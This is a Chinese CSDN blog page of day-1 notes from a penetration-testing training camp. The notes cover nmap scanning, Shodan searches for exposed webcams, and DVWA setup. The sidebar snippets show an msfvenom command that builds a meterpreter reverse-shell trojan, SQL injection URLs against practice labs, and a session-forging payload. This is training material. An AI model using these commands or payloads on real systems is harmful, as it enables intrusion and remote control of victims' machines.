蓝盾实训营day1——配置渗透环境和SQL注入

最新推荐文章于 2021-08-18 23:30:51 发布
最新推荐文章于 2021-08-18 23:30:51 发布
阅读量786 收藏 6
点赞数
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/80979173
版权

蓝盾实训营day1——配置渗透环境和SQL注入

有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。

黑客是如何入侵的

  • 踩点
    • whois
  • 扫描
    • nmap
  • 提权
  • 破坏
  • 后门

搜索网络设备

shodan.io

远程摄像头……
搜索jaws/1.0 country:”CN”

windows服务器

  • 不开源
  • 收费

nmap命令

  • nmap -sn 10.21.31.0/24 //扫描局域网
  • nmap -O 10.21.31.0 //扫描单台主机
  • Metasploit 集成漏洞攻击工具

DVMA

渗透测试用的环境

配置

这里写图片描述
编辑config/config.inc.php.dist:
这里写图片描述
配置好数据库账号跟密码。

最低0.47元/天 解锁文章
mingC0758
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
本地搭建简单SQL注入环境
endeav_or的博客
08-10 1万+
首先本地要有一个wamp server,因为SQL注入涉及到与数据库交互,所以先从搭建测试数据库开始。       打开mysql console,输入root账户密码登陆。创建一个数据库,并命名为fake,命令如下:create database fake;      因为我之前已经建立好了,这里直接配置fake数据库的用户权限,配置为leon用户访问,且leon用户的密码为leon,命令如下:
Jaws 1.1.1 完整版.gz
05-25
Jaws是一个小型框架级别的内容管理系统(CMS),它使用PHP开发,数据库为MySQL.它界面简洁定制方便,前台界面基于Web标准设计,后台使用 Ajax操作管理.它内置了很多常用功能模块,称为gadget,开发者使用Jaws可以快速简单的架设网站,开发者参考gadget的开发文档可以自己 定制开发功能模块插件.Jaws支持多语言,theme页面风格模板等流行和必要的CMS要素,所以它自己也称是一个小型的框架. 环境需求: PHP >= 4.3.6 MySQL >= 4.1 Postgresql >= 7.4 Oracle >= 8.0 MSSQL >= 8.0 Firebird >= 1.5 Interbase >= 6.0 SQLite >= 2.8 Apache 1.3, Apache 2, Cherokee >> 0.4.29 (under fcgi), IIS, LiteSpeed, LightTPD
SQL注入系列(一)——超详细SQL注入环境搭建
weixin_49058775的博客
08-18 2467
首先准备一台:windows2008 sever 的虚拟机(如果电脑配置较低的,可以开自己本机) Phpstudy2016(个人喜好) 下载chrome浏览器(用google浏览器,存属于个人爱好哈~) https://www.xp.cn/ (phpstudy官方网站啊,不要下载一些带后门哦) 点击windows版 当然虚拟机配置跟不上的,可用本机下载,拖入虚拟机里进行安装 这个phpstudy有多个版...
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
蓝盾防火墙操作 手册(V1.8)v1.rar
02-15
蓝盾防火墙是新一代高速状态检测的包过滤防火墙,采用专用网络处理器 集成安全系统架构,全面提升报文过滤检测、攻击检测、NAT特性的性能;同时 可实现安全业务的全方面拓展,其灵活的模块化结构综合报文过滤、...
蓝盾防火墙命令手册——很有用的
08-18
蓝盾防火墙的操作命令手册,希望对各位有用!
蓝盾防火墙设备配置指导
12-17
介绍蓝盾防火墙的设备配置管理内容,分为8个部分介绍防火墙技术在蓝盾设备上的实现,是网络安全课程的重要资料之一,特别是配置蓝盾公司设备的单位,用于单位培训或个人学习,都是较好的操作指导手册。
实验十一蓝盾防火墙的连接与登录配置.docx
12-20
实验十一蓝盾防火墙的连接与登录配置.docx
Python-蓝盾bkci是一个开源的持续集成和持续交付系统
08-10
这个文件可能包含了源代码、配置文件、文档和其他资源,用户可以通过解压并安装来搭建和使用蓝盾bk-ci系统。 6. **开源特性**:蓝盾bk-ci的开源性质意味着任何开发者都可以查看其源代码,理解其工作原理,甚至可以...
蓝盾实训营day7——meterpreter木马生成和利用
mingC0758的博客
07-17 1120
meterpreter木马生成和利用 木马生成 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe lhost 本地ip lport 本地端口 命令完成后,会在当前目录下生成一个...
Sql 注入基础原理+实验
wuhuimin521的博客
05-16 1800
Sql 注入基础原理介绍 一、实验说明 1.1 实验内容 SQL注入攻击通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,本章课程通过 LAMP 搭建 Sql 注入环境,两个实验分别介绍 Sql 注入爆破数据库、Sql 注入绕过验证两个知识点。 1.2 实验知识点 Sql 注入漏洞的原理 Sql 注入点的判...
SQL注入实验——web靶机第一关
qq_41554179的博客
03-09 2957
测试交互方法(此靶机为get); 判断字符类型;(此靶机没报错,为字符型) 构造闭合(次靶机闭合为 ‘ ); 爆库名; http://192.168.96.133/sqli-labs-master/Less-1/?id=-1 ' union all select 1,2,database() --+ 爆表名; http://192.168.96.133/sqli-labs-master/L...
WordPress漏洞之————SQL注入漏洞与提权分析
Fly_鹏程万里
03-30 5963
威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问题,但是却没有像他blog中所说的那样可以通过订阅者这样的低权限来触发SQL注入漏洞...
CTF实验吧-简单的sql注入3【sqlmap直接跑】
Sp4rkW的博客
07-23 5190
原理内容及连接: mysql报错注入 格式:flag{} 解题链接:http://ctf5.shiyanbar.com/web/index_3.php 本来以为和1,2一样的思路,加字符来过被忽略的关键字,结果,习惯性打个0'='0就发现这题有点不对劲 hello是什么鬼!! 前面的格式/**/,/*!*/都试了试,没效果,一个硕大的单词hello仿佛在嘲笑我,然后...
sql注入实验
ByeBye(野蛮生长)
05-09 1357
sql注入 SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 注入方式有GET注入,POST注入,COOKIE注入,HTTP HEADER注入等方式,其中DSQLTools利用的是GET注入方式。简单来说它的目标是网址中含有id=xxx类似的动态页面。 DSQLTools介绍 自创的注入引擎,能检测更多存在注入的连接。使用多线程技术,...
渗透测试——SQL注入实验(Sqlmap)
YT的博客
02-11 6352
实验环境 本实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具:sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,点击登录界面 2....
记一次渗透挖洞提权实战
weixin_43639741的博客
06-10 2787
摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。 0x01 进入后台 在通过googlehack语法挖掘beescms时发现了这个站点 利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据 _SESSION[login_in]=1&_SESSION...
如何批量管理蓝盾硬盘还原
最新发布
05-11
如果您需要批量管理蓝盾硬盘还原,可以使用以下步骤: 1. 打开蓝盾硬盘还原软件,并选择“批量操作”选项。 2. 添加要还原的硬盘列表,并设置还原选项,如还原目标、还原方式等。 3. 点击“开始还原”按钮,等待硬盘还原完成。 在批量管理蓝盾硬盘还原时,需要注意以下事项: 1. 确认要还原的硬盘是否与蓝盾硬盘还原软件兼容。 2. 确认还原选项是否正确,以避免数据丢失或其他问题。 3. 确认硬盘还原完成后,进行测试以确保还原成功。 如果您对批量管理蓝盾硬盘还原不熟悉,建议先进行单个硬盘的还原测试,以确保操作正确无误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值